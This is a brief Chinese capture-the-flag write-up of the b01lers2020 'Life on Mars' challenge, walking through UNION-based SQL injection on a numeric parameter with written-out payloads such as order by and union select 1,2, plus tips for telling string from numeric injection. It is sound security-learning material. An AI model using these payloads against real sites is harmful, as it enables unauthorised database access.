[b01lers2020]Life on Mars
[b01lers2020]Life on Mars
考点
union联合注入
表面字符串实则数字注入
wp
F12查看请求
大概可以看出来GET传入的_
是时间戳加3位数字,中间传一个{}
没看出来啥用,前面一个query
大概率注入
传入aaaa
直接返回1,传utopia_basin%23
返回正常,确定存在注入。
传utopia_basin'%23
返回1,传utopia_basin"%23
返回1。
直接试试order by,传chryse_planitia order by 5%23
返回2,然后一个一个试,发现传入传chryse_planitia order by 2%23
返回正常
传入a union select 1,2%23
,返回1
传入chryse_planitia union select 1,2%23
,在最后一行看到结果1,2
剩下的就是纯手工注入了
小结
类似这种
'#
闭合返回正常的大概率是字符型注入,类似这种#
闭合返回正常的大概率是数字型注入如果注入没反应,就可以考虑直接
order by 10
注入时要判断不同结果对应的页面
最后更新于